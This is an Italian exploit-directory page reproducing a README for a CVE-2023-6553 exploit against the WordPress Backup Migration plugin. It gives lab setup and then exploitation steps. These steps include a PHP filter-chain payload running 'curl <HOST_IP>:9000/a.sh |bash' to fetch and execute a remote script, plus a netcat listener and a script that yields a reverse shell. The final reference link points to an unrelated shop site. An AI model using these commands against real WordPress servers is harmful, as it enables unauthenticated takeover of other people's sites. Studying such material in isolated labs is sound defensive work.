Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-6553 — Sviluppo di exploit per CVE-2023-6553 sul plugin di backup in Wordpress | Kitploit
Strumenti/GitHubGitHub/harshit-mashru/cve-2023-6553
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubharshit-mashru/cve-2023-6553

CVE-2023-6553

Sviluppo di exploit per CVE-2023-6553 sul plugin di backup in Wordpress

Vedi Repository
41 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-6553

Sviluppo di exploit per CVE-2023-6553 sul plugin Backup in WordPress

Questa è una CVE critica con un punteggio CVSS di 9.8

La vulnerabilità consente a un attaccante di inviare comandi al server che esegue la versione vulnerabile del plugin

Versione vulnerabile Backup <= 1.3.7

Configurazione

  1. git clone del repository

  2. Esegui il comando seguente per configurare i contenitori docker

root@kitploit:~
docker-compose up -d

Dovresti vedere 2 contenitori docker

  • Wordpress
  • SQL
  1. Ora puoi navigare al sito WordPress sull'IP del contenitore docker e può anche essere raggiunto all'indirizzo
root@kitploit:~
http://localhost:8000/
  1. Per installare il plugin di backup vulnerabile esegui il seguente comando
root@kitploit:~
wget https://downloads.wordpress.org/plugin/backup-backup.1.3.6.zip
  1. Ora accedi al sito WordPress usando il link del passo 3 e installa il plugin di backup dopo averlo scaricato con il comando precedente

Sfruttamento

  1. Avvia un listener sulla porta 9000 per ricevere le callback quando eseguiamo l'exploit.
root@kitploit:~
python3 -m http.server
  1. Esegui lo script go usando il seguente comando
root@kitploit:~
go run exploit.go -chain="<?php exec('curl <HOST_IP>:9000/a.sh |bash');?>"
  1. Riceverai il seguente errore
root@kitploit:~
HTTP Response Body:  <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Size of a request header field exceeds server limit.</p>
<hr>
<address>Apache/2.4.62 (Debian) Server at 172.18.0.3 Port 80</address>
</body></html>

Questo accade perché dopo le conversioni del filtro, la dimensione dell'intestazione supera il limite consentito dal server.

  1. Quindi ora suddividiamo il nostro comando in blocchi, lo scriviamo in un file sul server remoto e poi lo eseguiamo, ma prima dobbiamo metterci in ascolto per ottenere una reverse shell
root@kitploit:~
nc -nlvp 8080

e ora esegui il comando per sfruttare il plugin vulnerabile

root@kitploit:~
python3 final_exploit.py
  1. A questo punto dovresti avere una reverse shell

Riferimenti

  • https://patchstack.com/articles/test-wordpress-plugin-security/
  • https://patchstack.com/whitepaper/the-state-of-wordpress-security-in-2021/
  • https://wordpress.org/plugins/backup-backup/
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup-backup/backup-migration-137-unauthenticated-remote-code-execution
  • https://plugins.trac.wordpress.org/browser/backup-backup/​
  • https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py ​
  • https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it ​
  • Quanto è facile verificare se è presente una versione vulnerabile di WordPress: https://www.thetraveloutlier.com/shop/
Scarica lo strumento